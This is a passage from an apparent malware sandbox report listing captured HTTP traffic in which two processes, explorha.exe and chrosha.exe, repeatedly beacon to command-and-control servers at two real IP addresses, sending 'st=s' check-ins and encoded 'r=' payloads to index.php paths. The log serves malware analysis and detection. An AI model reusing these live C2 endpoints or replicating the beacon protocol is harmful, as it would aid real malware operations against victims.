                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:43.696753979 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      174192.168.2.550013193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:43.323101997 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:43.568595886 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      175192.168.2.550014193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:43.928541899 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.173676014 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      176192.168.2.550015193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.047102928 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.288162947 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.289083958 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.534444094 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      177192.168.2.550016193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.425004959 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.675190926 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      178192.168.2.550017193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.889322042 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.129481077 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.131386995 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.375921965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      179192.168.2.550018193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.040631056 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.286217928 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      180192.168.2.550020193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.667098045 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.919879913 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      181192.168.2.550021193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.736963987 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.975958109 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.977617025 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.224092960 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      182192.168.2.550022193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.178802967 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.431847095 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      183192.168.2.550023193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.586678028 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.835067987 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.836169958 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.088819981 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      184192.168.2.550024193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.786720037 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.031111956 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      185192.168.2.550025193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.287935019 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.544823885 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      186192.168.2.550026193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.439147949 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
